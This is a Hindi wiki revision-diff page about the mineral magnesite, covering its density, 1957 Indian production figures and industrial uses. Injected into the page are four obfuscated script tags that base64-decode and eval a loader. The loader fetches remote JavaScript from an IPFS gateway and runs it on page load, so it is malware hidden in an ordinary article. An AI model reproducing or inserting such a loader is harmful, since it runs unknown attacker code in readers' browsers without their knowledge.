Difference between revisions of "मैग्नेसाइट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} '''मैग्नेसाइट''' मैग्नीशियम कार्बोनेट का [[...' के साथ नया पन्ना बनाया)
 
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''मैग्नेसाइट''' मैग्नीशियम कार्बोनेट का [[खनिज]] है। यह क्षारीय तापरोधक खनिजों में सर्वाधिक महत्त्वपूर्ण है।<br />
'''मैग्नेसाइट''' मैग्नीशियम कार्बोनेट का [[खनिज]] है। यह क्षारीय तापरोधक खनिजों में सर्वाधिक महत्वपूर्ण है।  
+
<br />
 
*मैग्नेसाइट [[सफ़ेद रंग]] का खनिज होता है जिसका आपेक्षिक [[घनत्व]] 2.9-3.1 है।
 
*मैग्नेसाइट [[सफ़ेद रंग]] का खनिज होता है जिसका आपेक्षिक [[घनत्व]] 2.9-3.1 है।
*सन [[1957]] में मैग्नेसाइट का उत्पादन88,885 टन था जिसका मूल्य 17,95000 रूपया हुआ।  
+
*सन [[1957]] में मैग्नेसाइट का उत्पादन88,885 टन था जिसका मूल्य 17,95000 रुपया हुआ।  
 
*इनमें से लगभग विदेश को निर्यात किया गया तथा शेष भाग [[भारत]] में ही [[ऊष्मा]] प्रतिरोधक ईटों के निर्माण, [[इस्पात]] और विद्युत्‌ भटिठयों में आस्तर देने में और सीमेंट बनाने में प्रयुक्त हुआ।  
 
*इनमें से लगभग विदेश को निर्यात किया गया तथा शेष भाग [[भारत]] में ही [[ऊष्मा]] प्रतिरोधक ईटों के निर्माण, [[इस्पात]] और विद्युत्‌ भटिठयों में आस्तर देने में और सीमेंट बनाने में प्रयुक्त हुआ।  
 
*मैग्नेसाइट के [[लवण|लवणों]] का व्यवहार औषधियों, [[कागज]] और लुगदी के निर्माण, उनके धोने और पेंट बनाने में होता है ।
 
*मैग्नेसाइट के [[लवण|लवणों]] का व्यवहार औषधियों, [[कागज]] और लुगदी के निर्माण, उनके धोने और पेंट बनाने में होता है ।
Line 9: Line 9:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{खान और खनिज}}
+
{{खान और खनिज}}{{रसायन विज्ञान}}
 
[[Category:रसायन विज्ञान]]
 
[[Category:रसायन विज्ञान]]
 +
[[Category:खान और खनिज]]
 +
[[Category:रासायनिक यौगिक]]
 
[[Category:विज्ञान कोश]]
 
[[Category:विज्ञान कोश]]
[[Category:नया पन्ना अप्रॅल-2012]]
 
[[Category:खान और खनिज]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 12:24, 18 February 2021

maignesait maignishiyam karbonet ka khanij hai. yah kshariy taparodhak khanijoan mean sarvadhik mahattvapoorn hai.

  • maignesait safed rang ka khanij hota hai jisaka apekshik ghanatv 2.9-3.1 hai.
  • san 1957 mean maignesait ka utpadan88,885 tan tha jisaka mooly 17,95000 rupaya hua.
  • inamean se lagabhag videsh ko niryat kiya gaya tatha shesh bhag bharat mean hi ooshma pratirodhak eetoan ke nirman, ispat aur vidyuth‌ bhatithayoan mean astar dene mean aur simeant banane mean prayukt hua.
  • maignesait ke lavanoan ka vyavahar aushadhiyoan, kagaj aur lugadi ke nirman, unake dhone aur peant banane mean hota hai .


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>